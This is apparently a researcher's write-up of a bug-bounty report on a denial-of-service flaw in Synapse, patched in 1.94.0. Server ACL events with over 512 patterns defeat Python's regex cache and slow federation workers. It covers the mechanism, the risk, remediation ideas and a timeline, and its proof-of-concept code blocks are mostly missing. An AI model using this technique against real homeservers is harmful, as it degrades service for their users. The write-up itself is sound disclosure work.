ACL cache thrashing Synapse

Introduction

This article is a copy of a report I sent to Element through their YesWeHack bug bounty program. The vulnerability was patched in Synapse 1.94.0.

Description

On every batch of incoming PDUs, Synapse checks the sender against the list of hostname in the m.room.server_acl state event of the destination room.
This event contains a list of patterns which can contain wildcards that are translated to regexps, then passed to Python's re module, which compiles and runs it.

This is all usually pretty quick (~0.6ms with 500 patterns on a modern CPU; I used a Ryzen 5 PRO 5650G), but there is a degenerate case that can make it much slower (up to ~100ms).

Exploitation

The annoying part is the regexp compilation, which takes ~20µs per regexp. This is usually unnoticeable, because Python has a 512-entries LRU cache and one usually doesn't usually compile this many regexp.

However, large m.room.server_acl events cause 100% cache miss, by compiling over 512 patterns in the same order over and over. Here is an example of this threshold behavior (in an iPython shell, which provides the neat %timeit command):

As you can see, compiling 550 patterns instead of 500 causes the whole loop to be 100 times slower

By setting a m.room.server_acl event in a room with over 512 patterns (in fact, the higher the better), one can slow down the event throughput of Synapse's federation workers. In the examples below, I will use ["e0.uk", "e1.uk", ..., "e4999.uk"], which has many patterns but is small enough to fit in a PDU. PoC
Again, in an iPython shell:


Out[8]: 58916
]]>

By setting such a large m.room.server_acl event, every Synapse server in a room will waste ~100ms on every incoming batch of PDU for the room, from any other server. This means a single worker can be tied up with only 10 events per second in that room.

Risk

Abusers who can join a room they control from a specific homeserver can make that homeserver considerably slower.
Actually, this is already happening accidentally in Matrix HQ, which currently has 623 banned hostnames, which is high enough to make checks take 13ms:

And even when Matrix HQ had under 512 hostnames, having its incoming PDUs interleaved with other rooms which had other hostnames might have partially triggered it.

Remediation

A quick workaround would be for Synapse to use a larger cache. For example, with 5M entries in the cache, it would require setting up 1000 such rooms, and sending PDUs to them in a constant order, in order to trigger the degenerate case. That might be good enough. (And definitely avoids the accidental case.)

Fixing completely is hard though. When my own software (an IRC bot) accidentally hit this case, I implemented my own cache, which never expires compiled regexps as long as the original hostmask is still used somewhere.
But that only works because IRC bots keep the whole hostmask set in memory from start to shutdown. That probably wouldn't work for Synapse workers, which have to fetch it from the database every time.

An option that might work for Synapse would be to write every room's compiled regexps to a more persistent cache (eg. postgresql), using Python's pickle module to serialize. This seems to give a nice runtime:

Timeline

2023-03-22: Reported to Element through their YesWeHack bug bounty program.
2023-07-03: Confirmed by Element, who awarded me a bug bounty.
2023-09-21: Synapse developers at Element wrote a patch
2023-09-26: Patch was merged
2023-10-10: Synapse 1.94.0 was released with the patch
2023-10-14: I noticed the fix, asked Element for news on the status of my report.
2023-10-17: Element notified me it is indeed fixed and public.